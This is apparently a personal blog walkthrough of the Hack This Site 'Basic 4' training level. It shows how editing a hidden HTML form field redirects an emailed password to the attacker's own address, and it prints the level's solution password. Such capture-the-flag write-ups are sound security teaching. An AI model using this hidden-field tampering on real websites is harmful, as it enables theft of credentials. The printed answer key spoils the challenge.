What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.


Hack This Site! - Basic 4


An email script has been set up, which sends the password to the administrator. Requirements: HTML knowledge, an email address

Level 4

This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:

  1. View page source code
  2. Find the HTML form for email notification
    <form action="/missions/basic/4/level4.php" method="post">
    <input type="hidden" name="to" value="webmaster@hulla-balloo.com" />
    <input type="submit" value="Send password to Sam" />
  3. Modify the form and save it into a file named "test.html"
    <form action="http://www.hackthissite.org/missions/missions/basic/4/level4.php" method="post">
    <input type="hidden" name="to" value="pwn@foo.org" />
    <input type="submit" value="Send password to Sam" />
  4. Use any browser to visit test.html.
  5. Press the button "Send password to Sam"
  6. There's a text on the page.
    password: b314c515
  7. Back to the level page and submit the password.
  8. Congratulations, you have successfully completed basic 4!